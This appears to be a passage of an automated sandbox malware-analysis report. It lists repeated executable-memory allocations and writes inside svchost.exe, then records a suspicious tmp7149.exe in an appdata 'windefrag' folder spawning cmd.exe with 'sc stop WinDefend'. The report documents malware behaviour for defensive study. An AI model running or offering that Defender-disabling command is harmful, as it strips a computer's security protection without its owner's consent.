| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 18 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20022, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0e0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 28 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2002c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0e8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 16 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20020, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0f0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0f8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 10 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001a, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a100, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a108, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 20 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20024, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a110, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a118, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a120, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a128, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 19 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20023, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a130, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 20 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20024, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a138, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a140, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a148, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a150, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a158, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 22 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20026, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a160, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a168, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a170, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
|
For performance reasons, the remaining 726 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Process #18: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:19, Reason: Child Process |
| Unmonitor | End Time: 00:02:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x528 |
| Parent PID | 0x668 (c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
